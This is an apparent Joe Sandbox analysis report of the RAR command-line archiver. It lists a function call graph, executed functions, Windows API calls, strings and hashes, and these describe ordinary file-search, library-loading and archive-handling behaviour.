7ff69a449370 pre_c_initialization 48 API calls 39559->39560 39561 7ff69a443cea 39560->39561 39570 7ff69a44978c GetEnvironmentStringsW 39561->39570 39564 7ff69a443cf7 39566 7ff69a444a74 __vcrt_freefls 15 API calls 39564->39566 39566->39558 39567 7ff69a443d04 39568 7ff69a444a74 __vcrt_freefls 15 API calls 39567->39568 39568->39564 39569->39556 39571 7ff69a4497ba WideCharToMultiByte 39570->39571 39572 7ff69a44985e 39570->39572 39571->39572 39576 7ff69a449814 39571->39576 39574 7ff69a449868 FreeEnvironmentStringsW 39572->39574 39575 7ff69a443cef 39572->39575 39574->39575 39575->39564 39582 7ff69a443d38 31 API calls 4 library calls 39575->39582 39583 7ff69a444ab4 39576->39583 39579 7ff69a44984b 39581 7ff69a444a74 __vcrt_freefls 15 API calls 39579->39581 39580 7ff69a449824 WideCharToMultiByte 39580->39579 39581->39572 39582->39567 39584 7ff69a444aff 39583->39584 39588 7ff69a444ac3 __vcrt_getptd_noexit 39583->39588 39590 7ff69a444f3c 15 API calls abort 39584->39590 39586 7ff69a444ae6 RtlAllocateHeap 39587 7ff69a444afd 39586->39587 39586->39588 39587->39579 39587->39580 39588->39584 39588->39586 39589 7ff69a4436c0 new 2 API calls 39588->39589 39589->39588 39590->39587 39592 7ff69a42b496 GetProcAddress 39591->39592 39593 7ff69a417e45 39591->39593 39594 7ff69a42b4cb GetProcAddress 39592->39594 39595 7ff69a42b4ae 39592->39595 39596 7ff69a3f7a68 39593->39596 39594->39593 39595->39594 39597 7ff69a3f7a76 39596->39597 39617 7ff69a442ae4 39597->39617 39599 7ff69a3f7a80 39600 7ff69a442ae4 setbuf 60 API calls 39599->39600 39601 7ff69a3f7a94 39600->39601 39626 7ff69a3f7b44 GetStdHandle GetFileType 39601->39626 39604 7ff69a3f7b44 3 API calls 39605 7ff69a3f7aae 39604->39605 39606 7ff69a3f7b44 3 API calls 39605->39606 39608 7ff69a3f7abe 39606->39608 39607 7ff69a3f7b12 39616 7ff69a3fcd78 SetConsoleCtrlHandler 39607->39616 39610 7ff69a3f7aeb 39608->39610 39629 7ff69a442abc 31 API calls 2 library calls 39608->39629 39610->39607 39631 7ff69a442abc 31 API calls 2 library calls 39610->39631 39611 7ff69a3f7adf 39630 7ff69a442b40 33 API calls 3 library calls 39611->39630 39614 7ff69a3f7b06 39632 7ff69a442b40 33 API calls 3 library calls 39614->39632 39619 7ff69a442ae9 39617->39619 39618 7ff69a447ee8 39633 7ff69a444f3c 15 API calls abort 39618->39633 39619->39618 39621 7ff69a447f23 39619->39621 39635 7ff69a447d98 60 API calls 2 library calls 39621->39635 39622 7ff69a447eed 39634 7ff69a444e1c 31 API calls _invalid_parameter_noinfo 39622->39634 39625 7ff69a447ef8 39625->39599 39627 7ff69a3f7a9e 39626->39627 39628 7ff69a3f7b61 GetConsoleMode 39626->39628 39627->39604 39628->39627 39629->39611 39630->39610 39631->39614 39632->39607 39633->39622 39634->39625 39635->39625 39636 7ff69a44231c 39637 7ff69a44238c 39636->39637 39638 7ff69a442342 GetModuleHandleW 39636->39638 39649 7ff69a446938 EnterCriticalSection 39637->39649 39638->39637 39641 7ff69a44234f 39638->39641 39640 7ff69a446998 fflush LeaveCriticalSection 39643 7ff69a442460 39640->39643 39641->39637 39650 7ff69a4424d4 GetModuleHandleExW 39641->39650 39642 7ff69a44246c 39643->39642 39645 7ff69a442488 11 API calls 39643->39645 39644 7ff69a442396 39646 7ff69a4443b8 16 API calls 39644->39646 39648 7ff69a442410 39644->39648 39645->39642 39646->39648 39648->39640 39651 7ff69a4424fe GetProcAddress 39650->39651 39652 7ff69a442525 39650->39652 39651->39652 39655 7ff69a442518 39651->39655 39653 7ff69a44252f FreeLibrary 39652->39653 39654 7ff69a442535 39652->39654 39653->39654 39654->39637 39655->39652 39656 7ff69a3e3e71 39657 7ff69a3e3e81 39656->39657 39658 7ff69a3e3e89 39656->39658 39657->39658 39667 7ff69a439a14 49 API calls 39657->39667 39660 7ff69a3e3edd 39658->39660 39661 7ff69a3e3ea3 39658->39661 39662 7ff69a43a610 _UnwindNestedFrames 8 API calls 39660->39662 39668 7ff69a40331c 48 API calls 2 library calls 39661->39668 39664 7ff69a3e3eef 39662->39664 39665 7ff69a3e3eab 39665->39660 39669 7ff69a3e63e8 8 API calls 2 library calls 39665->39669 39667->39658 39668->39665 39669->39660 39670 7ff69a42bb70 39673 7ff69a42bb80 39670->39673 39682 7ff69a42bae8 39673->39682 39675 7ff69a42bb79 39676 7ff69a42bb97 39676->39675 39687 7ff69a3f1690 39676->39687 39678 7ff69a42bbc8 SetEvent 39679 7ff69a42bbd5 LeaveCriticalSection 39678->39679 39680 7ff69a42bae8 67 API calls 39679->39680 39680->39676 39691 7ff69a42b974 WaitForSingleObject 39682->39691 39685 7ff69a42bb16 EnterCriticalSection LeaveCriticalSection 39686 7ff69a42bb12 39685->39686 39686->39676 39688 7ff69a3f16a4 39687->39688 39689 7ff69a3f16c2 EnterCriticalSection 39687->39689 39688->39689 39699 7ff69a3f1180 39688->39699 39689->39678 39689->39679 39692 7ff69a42b986 GetLastError 39691->39692 39693 7ff69a42b9b7 39691->39693 39697 7ff69a3fca6c 48 API calls 2 library calls 39692->39697 39693->39685 39693->39686 39695 7ff69a42b9a6 39698 7ff69a3fca40 61 API calls _CxxThrowException 39695->39698 39697->39695 39698->39693 39700 7ff69a3f11ab 39699->39700 39707 7ff69a3f11b0 39699->39707 39709 7ff69a3f17c8 216 API calls 2 library calls 39700->39709 39702 7ff69a3f166a 39702->39688 39703 7ff69a416d38 216 API calls 39703->39707 39704 7ff69a3f1080 48 API calls 39704->39707 39706 7ff69a416fe8 216 API calls 39706->39707 39707->39702 39707->39703 39707->39704 39707->39706 39708 7ff69a416e90 216 API calls 39707->39708 39710 7ff69a3f17c8 216 API calls 2 library calls 39707->39710 39708->39707 39709->39707 39710->39707 39711 7ff69a3e7a5b 39712 7ff69a3e7a60 39711->39712 39713 7ff69a3f9be0 14 API calls 39712->39713 39714 7ff69a3e7af7 39712->39714 39713->39714 39715 7ff69a3e7bda 39714->39715 39744 7ff69a401e1c GetFileTime 39714->39744 39716 7ff69a3eb540 147 API calls 39715->39716 39718 7ff69a3e7bf8 39716->39718 39721 7ff69a3e7c3e 39718->39721 39745 7ff69a439b98 216 API calls 3 library calls 39718->39745 39720 7ff69a3eb540 147 API calls 39723 7ff69a3e7c9c 39720->39723 39721->39720 39722 7ff69a3e7f89 39723->39722 39746 7ff69a406378 39723->39746 39725 7ff69a3e7cd7 39726 7ff69a406378 4 API calls 39725->39726 39728 7ff69a3e7cf3 39726->39728 39727 7ff69a3e7de1 39734 7ff69a3e7e4e 39727->39734 39751 7ff69a4198dc 39727->39751 39728->39727 39729 7ff69a3e7d59 39728->39729 39730 7ff69a3e7d38 39728->39730 39733 7ff69a43a444 new 4 API calls 39729->39733 39732 7ff69a43a444 new 4 API calls 39730->39732 39738 7ff69a3e7d42 std::bad_alloc::bad_alloc 39732->39738 39733->39738 39757 7ff69a3e1204 48 API calls 39734->39757 39736 7ff69a3e7eb3 39739 7ff69a3e7edb 39736->39739 39758 7ff69a419680 39736->39758 39738->39727 39750 7ff69a43ba34 RtlPcToFileHeader RaiseException 39738->39750 39764 7ff69a406424 8 API calls _UnwindNestedFrames 39739->39764 39741 7ff69a3e7f56 39743 7ff69a3eb540 147 API calls 39741->39743 39743->39722 39744->39715 39745->39721 39747 7ff69a406396 39746->39747 39749 7ff69a4063a0 39746->39749 39748 7ff69a43a444 new 4 API calls 39747->39748 39748->39749 39749->39725 39750->39727 39752 7ff69a419926 39751->39752 39753 7ff69a41993c 39751->39753 39754 7ff69a3f90b8 75 API calls 39752->39754 39755 7ff69a3f90b8 75 API calls 39753->39755 39756 7ff69a419934 39754->39756 39755->39756 39756->39734 39757->39736 39762 7ff69a4196a4 39758->39762 39759 7ff69a4197d7 39760 7ff69a402574 126 API calls 39760->39762 39762->39759 39762->39760 39763 7ff69a439b98 216 API calls 39762->39763 39765 7ff69a406498 72 API calls new 39762->39765 39763->39762 39764->39741 39765->39762 39766 7ff69a449c74 39767 7ff69a449c7c 39766->39767 39768 7ff69a449cbb 39767->39768 39769 7ff69a449cac 39767->39769 39770 7ff69a449cc5 39768->39770 39788 7ff69a44ce08 32 API calls 2 library calls 39768->39788 39787 7ff69a444f3c 15 API calls abort 39769->39787 39775 7ff69a444b8c 39770->39775 39773 7ff69a449cb1 __scrt_fastfail 39776 7ff69a444bab 39775->39776 39777 7ff69a444ba1 39775->39777 39779 7ff69a444bb0 39776->39779 39783 7ff69a444bb7 __vcrt_getptd_noexit 39776->39783 39778 7ff69a444ab4 setbuf 16 API calls 39777->39778 39780 7ff69a444ba9 39778->39780 39781 7ff69a444a74 __vcrt_freefls 15 API calls 39779->39781 39780->39773 39781->39780 39782 7ff69a444bf6 39789 7ff69a444f3c 15 API calls abort 39782->39789 39783->39782 39784 7ff69a444be0 RtlReAllocateHeap 39783->39784 39786 7ff69a4436c0 new 2 API calls 39783->39786 39784->39780 39784->39783 39786->39783 39787->39773 39788->39770 39789->39780 39790 7ff69a42a924 39791 7ff69a42a949 snprintf 39790->39791 39792 7ff69a42a97f CompareStringA 39791->39792

                                                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                                                      Function 00007FF69A3F54C0 Relevance: 36.3, APIs: 4, Strings: 16, Instructions: 1336COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: *.%ls$*?.$+$7z;ace;arj;bz2;cab;gz;jpeg;jpg;lha;lz;lzh;mp3;rar;taz;tgz;xz;z;zip;zipx$EML$ERR$LOG$NUL$OFF$SFX$SND$VER$default.sfx$rar.log$stdin$stdin
                                                                                                                                                                                                                                      • API String ID: 0-1628410872
                                                                                                                                                                                                                                      • Opcode ID: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
                                                                                                                                                                                                                                      • Instruction ID: 3b601c8ffdcec2478fffd6e8ae2fec467556165b478d5ca654343889a7712a71
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1EC2AE6292C6C381FA749F2481442BD36E1EF01B84F9981FECA0ECA6D5DF6DE945E350
                                                                                                                                                                                                                                      Function 00007FF69A3E1884 Relevance: 24.1, APIs: 5, Strings: 8, Instructions: 1374COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: %s%s $.ext$exe$rar$sfx$,6$BK$q:
                                                                                                                                                                                                                                      • API String ID: 0-1660254149
                                                                                                                                                                                                                                      • Opcode ID: a4b2bcfa1cfb40bc8db102f4b798c0a2e8355e5dea3c7943d5ce14f76aad6685
                                                                                                                                                                                                                                      • Instruction ID: 7769cd4ef89821c7b0bfc5c387c28b6980bf99ee6e38007f11b493b792fc1258
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a4b2bcfa1cfb40bc8db102f4b798c0a2e8355e5dea3c7943d5ce14f76aad6685
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E3E2AE26A08AC28AEB70DB26D8402FD37E1FB95788F6540B9DA4DC7796DF39D954C300
                                                                                                                                                                                                                                      Function 00007FF69A4248CC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69libraryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00007FF69A424AE0: FreeLibrary.KERNEL32(?,?,00000000,00007FF69A3FCC90), ref: 00007FF69A424AF5
                                                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(?,?,?,00007FF69A417E7D), ref: 00007FF69A42492E
                                                                                                                                                                                                                                      • GetVersionExW.KERNEL32(?,?,?,00007FF69A417E7D), ref: 00007FF69A42496A
                                                                                                                                                                                                                                      • LoadLibraryExW.KERNELBASE(?,?,?,00007FF69A417E7D), ref: 00007FF69A424993
                                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(?,?,?,00007FF69A417E7D), ref: 00007FF69A42499F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Library$Load$FileFreeModuleNameVersion
                                                                                                                                                                                                                                      • String ID: rarlng.dll
                                                                                                                                                                                                                                      • API String ID: 2520153904-1675521814
                                                                                                                                                                                                                                      • Opcode ID: 49b096ca26b206715f71fd28137422a8c8958387befaadcb30f15fb4690b8ba1
                                                                                                                                                                                                                                      • Instruction ID: d87ec7a0538e9b44fd9e93604a91451fdbe95ecd1a8ef4c53c83ff06f0066010
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 49b096ca26b206715f71fd28137422a8c8958387befaadcb30f15fb4690b8ba1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 14312E31A19A8285FB749F21E8402E933A4FB45B84F8051F5EA8DC6A98DF3DD546CB40
                                                                                                                                                                                                                                      Function 00007FF69A4046EC Relevance: 7.6, APIs: 5, Instructions: 99fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindFirstFileW.KERNELBASE(?,?,00000000,?,?,00007FF69A404620,?,00000000,?,00007FF69A427A8C), ref: 00007FF69A404736
                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,00000000,?,?,00007FF69A404620,?,00000000,?,00007FF69A427A8C), ref: 00007FF69A40476B
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,?,?,00007FF69A404620,?,00000000,?,00007FF69A427A8C), ref: 00007FF69A40477A
                                                                                                                                                                                                                                      • FindNextFileW.KERNELBASE(?,?,00000000,?,?,00007FF69A404620,?,00000000,?,00007FF69A427A8C), ref: 00007FF69A4047A4
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,?,?,00007FF69A404620,?,00000000,?,00007FF69A427A8C), ref: 00007FF69A4047B2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileFind$ErrorFirstLast$Next
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 869497890-0
                                                                                                                                                                                                                                      • Opcode ID: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
                                                                                                                                                                                                                                      • Instruction ID: b5a4e0b65a68e07fe55895c2ecd5d70c2cd8127fe405ee17ce783bfdde1f46a0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C541DF76A08A8196EA349B25E5402F973E0FB4AFB4F4003B1EABD837C5DF6CE5558300
                                                                                                                                                                                                                                      Function 00007FF69A3F901C Relevance: 4.5, APIs: 3, Instructions: 35encryptionCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1815803762-0
                                                                                                                                                                                                                                      • Opcode ID: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
                                                                                                                                                                                                                                      • Instruction ID: a9268c9c6f646243343a57b1a07285ee4d173a869e60d05ac56db2b08a962c26
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BB016D2AB1865182F7108B16A94432AB7A1EBC5FD0F1880B5DF4ED3B68CF7DD946C700
                                                                                                                                                                                                                                      Function 00007FF69A3EB540 Relevance: 2.0, APIs: 1, Instructions: 490COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Char
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 751630497-0
                                                                                                                                                                                                                                      • Opcode ID: d750600f3be21f8ccd2522ea66ef81f5d73d07ec8a0f66ae2bb9041de05645a8
                                                                                                                                                                                                                                      • Instruction ID: d27496310d60b8ab838ed7a5bc3eef0f1cc83a02dcf70ded01cad58b3d7cf599
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d750600f3be21f8ccd2522ea66ef81f5d73d07ec8a0f66ae2bb9041de05645a8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D022B132A086C296EB25DF30D4452FEBBE0FB50B48F5480B5DA8DD7699CE78E951C740
                                                                                                                                                                                                                                      Function 00007FF69A40AE10 Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
